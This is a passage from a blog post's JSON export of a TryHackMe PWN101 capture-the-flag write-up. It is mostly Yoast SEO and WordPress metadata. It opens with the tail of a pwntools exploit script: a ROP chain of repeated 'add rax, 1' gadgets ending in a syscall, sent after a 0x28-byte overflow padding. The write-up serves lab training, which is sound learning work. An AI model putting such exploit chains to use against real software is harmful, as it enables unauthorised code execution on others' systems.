0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x0000000000470d20) # add rax, 1 ; ret\np += pack('&lt;Q', 0x00000000004012d3) # syscall\n\nio.sendline(b'a'*0x28+p)\nio.interactive()<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>pwn 101 &#8211; Buff [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[1],"tags":[],"class_list":["post-708","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>TryHackMe PWN101 - my article<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/\" \/>\n<meta property=\"og:locale\" content=\"zh_TW\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"TryHackMe PWN101 - my article\" \/>\n<meta property=\"og:description\" content=\"pwn 101 &#8211; Buff [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/\" \/>\n<meta property=\"og:site_name\" content=\"my article\" \/>\n<meta property=\"article:published_time\" content=\"2025-03-19T07:35:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-03-24T08:39:38+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1897\" \/>\n\t<meta property=\"og:image:height\" content=\"241\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"chengyunpu\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005:\" \/>\n\t<meta name=\"twitter:data1\" content=\"chengyunpu\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9810\u4f30\u95b1\u8b80\u6642\u9593\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 \u5206\u9418\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/\"},\"author\":{\"name\":\"chengyunpu\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411\"},\"headline\":\"TryHackMe PWN101\",\"datePublished\":\"2025-03-19T07:35:00+00:00\",\"dateModified\":\"2026-03-24T08:39:38+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/\"},\"wordCount\":353,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411\"},\"image\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image-1024x130.png\",\"inLanguage\":\"zh-TW\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/\",\"url\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/\",\"name\":\"TryHackMe PWN101 - my article\",\"isPartOf\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image-1024x130.png\",\"datePublished\":\"2025-03-19T07:35:00+00:00\",\"dateModified\":\"2026-03-24T08:39:38+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#breadcrumb\"},\"inLanguage\":\"zh-TW\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-TW\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#primaryimage\",\"url\":\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image.png\",\"contentUrl\":\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image.png\",\"width\":1897,\"height\":241},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9801\",\"item\":\"https:\/\/chengyunpu.com\/wordpress\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"TryHackMe PWN101\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#website\",\"url\":\"https:\/\/chengyunpu.com\/wordpress\/\",\"name\":\"my article\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/chengyunpu.com\/wordpress\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"zh-TW\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411\",\"name\":\"chengyunpu\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-TW\",\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/8e26f1a47b73420e32e35b25e19c6abf045eb208b1a34d5d90f5d166505983d2?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/8e26f1a47b73420e32e35b25e19c6abf045eb208b1a34d5d90f5d166505983d2?s=96&d=mm&r=g\",\"caption\":\"chengyunpu\"},\"logo\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/image\/\"},\"sameAs\":[\"http:\/\/chengyunpu.com\/wordpress\"],\"url\":\"https:\/\/chengyunpu.com\/wordpress\/author\/chengyunpu\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"TryHackMe PWN101 - my article","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/","og_locale":"zh_TW","og_type":"article","og_title":"TryHackMe PWN101 - my article","og_description":"pwn 101 &#8211; Buff [&hellip;]","og_url":"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/","og_site_name":"my article","article_published_time":"2025-03-19T07:35:00+00:00","article_modified_time":"2026-03-24T08:39:38+00:00","og_image":[{"width":1897,"height":241,"url":"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image.png","type":"image\/png"}],"author":"chengyunpu","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005:":"chengyunpu","\u9810\u4f30\u95b1\u8b80\u6642\u9593":"3 \u5206\u9418"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#article","isPartOf":{"@id":"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/"},"author":{"name":"chengyunpu","@id":"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411"},"headline":"TryHackMe PWN101","datePublished":"2025-03-19T07:35:00+00:00","dateModified":"2026-03-24T08:39:38+00:00","mainEntityOfPage":{"@id":"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/"},"wordCount":353,"commentCount":0,"publisher":{"@id":"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411"},"image":{"@id":"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#primaryimage"},"thumbnailUrl":"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image-1024x130.png","inLanguage":"zh-TW","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/","url":"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/","name":"TryHackMe PWN101 - my article","isPartOf":{"@id":"https:\/\/chengyunpu.com\/wordpress\/#website"},"primaryImageOfPage":{"@id":"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#primaryimage"},"image":{"@id":"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#primaryimage"},"thumbnailUrl":"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image-1024x130.png","datePublished":"2025-03-19T07:35:00+00:00","dateModified":"2026-03-24T08:39:38+00:00","breadcrumb":{"@id":"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#breadcrumb"},"inLanguage":"zh-TW","potentialAction":[{"@type":"ReadAction","target":["https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/"]}]},{"@type":"ImageObject","inLanguage":"zh-TW","@id":"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#primaryimage","url":"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image.png","contentUrl":"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/03\/image.png","width":1897,"height":241},{"@type":"BreadcrumbList","@id":"https:\/\/chengyunpu.com\/wordpress\/2025\/03\/19\/tryhackme-pwn101\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9801","item":"https:\/\/chengyunpu.com\/wordpress\/"},{"@type":"ListItem","position":2,"name":"TryHackMe PWN101"}]},{"@type":"WebSite","@id":"https:\/\/chengyunpu.com\/wordpress\/#website","url":"https:\/\/chengyunpu.com\/wordpress\/","name":"my article","description":"","publisher":{"@id":"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/chengyunpu.com\/wordpress\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"zh-TW"},{"@type":["Person","Organization"],"@id":"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411","name":"chengyunpu","image":{"@type":"ImageObject","inLanguage":"zh-TW","@id":"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/8e26f1a47b73420e32e35b25e19c6abf045eb208b1a34d5d90f5d166505983d2?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/8e26f1a47b73420e32e35b25e19c6abf045eb208b1a34d5d90f5d166505983d2?s=96&d=mm&r=g","caption":"chengyunpu"},"logo":{"@id":"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/image\/"},"sameAs":["http:\/\/chengyunpu.com\/wordpress"],"url":"https:\/\/chengyunpu.com\/wordpress\/author\/chengyunpu\/"}]}},"_links":{"self":[{"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/posts\/708","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/comments?post=708"}],"version-history":[{"count":31,"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/posts\/708\/revisions"}],"predecessor-version":[{"id":743,"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/posts\/708\/revisions\/743"}],"wp:attachment":[{"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/media?parent=708"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/categories?post=708"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/tags?post=708"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}